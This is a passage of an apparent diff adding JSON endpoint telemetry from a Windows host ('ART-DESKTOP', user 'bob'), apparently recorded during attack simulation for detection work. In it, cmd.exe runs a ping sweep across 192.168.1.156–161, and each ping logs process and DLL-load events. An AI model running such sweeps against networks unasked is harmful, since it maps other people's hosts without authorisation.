"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" + }, + { + "event_type": "process", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572746830000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.156", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6236, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + "event_type": "process", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572751990000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.157", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4236, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "event_type": "process", + "pid": 4236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572756840000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.158", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6700, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572756980000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572756990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572756990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572756990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572756990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572756990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572756990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572756990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572756990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572756990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572756990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572756990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "event_type": "process", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572761990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.159", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3348, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "event_type": "process", + "pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572766830000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.160", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4768, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572766980000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572766980000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572766980000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572766980000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572766980000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572766980000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572766980000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572766980000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572766980000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572766980000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572766980000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572766980000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "event_type": "process", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572771830000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.161", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3596, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572771980000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572771980000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572771980000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572771980000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572771980000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572771980000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572771980000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572771980000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572771980000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572771980000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572771980000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 